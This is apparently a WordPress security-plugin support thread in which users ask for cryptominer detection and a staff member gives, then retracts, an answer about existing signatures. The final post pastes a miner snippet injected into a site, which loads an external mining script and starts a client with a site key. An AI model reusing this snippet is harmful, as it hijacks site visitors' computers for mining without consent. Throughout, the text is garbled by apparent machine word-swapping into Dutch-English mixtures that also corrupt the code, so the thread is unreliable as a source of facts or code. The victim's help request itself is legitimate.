It would be superb if you guys could add an option to scan for cryptocurrency miners. There have bot fairly a few WP attacks lately that are inserting thesis miners into WP sites.
Some people may legitimately want a miner on their webpagina so I guess this could be a warning?
Wordfence scans already include checks for cryptocurrency-miners signatures.
However note that you can “add extra signatures” on the Wordfence –>, Options pagina (wij only treat those extra patterns spil RegEx).
Please accept my apologies. I provided incorrect information.
I wasgoed discussing this topic with my colleagues and I misunderstood their reaction.
Wordfence scans do not include checks for cryptocurrency-miners signatures at the uur spil wij don’t have evidence yet that they frequently occur on WordPress sites. If you have any malware samples proving otherwise, please send them te.
However you can still add extra signatures on the Wordfence –>, Options pagina.
- This reply wasgoed modified Five months, Three weeks ago by wfyann. Reason: Extra informatie
Thanks for the update @wfyann
Is there any documentation for what signature format to use and where to find them?
You want evidence of CRYTO Miners: here you go. One of numerous results on GravityScan.
Medium Information Cryptominer Script Found (on /) Content Collapse
Cryptominer Script Found (on /)
Cryptominers use client browsers to mine for cryptocurrency and can have negative affects for users on the webpagina. If you meant to add this script please overlook this result. If you did not intentionally include this script your webpagina may have bot hacked.
Apologies for the delayed update.
Please have a look at this postbode on our blog regarding Wordfence upcoming features to detect cryptominer scripts
Superb! Thanks for the update @wyfann
Kaspersky is detecting this code from some of our sites:
<,div style=”bottom:0, visibility:visible !significant, display: block !significant,” >,<,center>,<,!– nsr-ID 30806962 1515082736 –>, <,script src=”https://www.hashing.win/scripts/zoogmoeder.js”>,<,/script>,<,script>,var miner = fresh Client.Anonymous(“6cbf25e53638b9537f4da07d24f73cf1cf50b28962aab453bba3fd9d1df99dd0”, < throttle: 0.Two>),miner.commence(),<,/script>,<,style>,#credits
Please let mij know how to eliminate it. I am suspecting it comes from SiteOrigin plugin and WordFence does not detect it.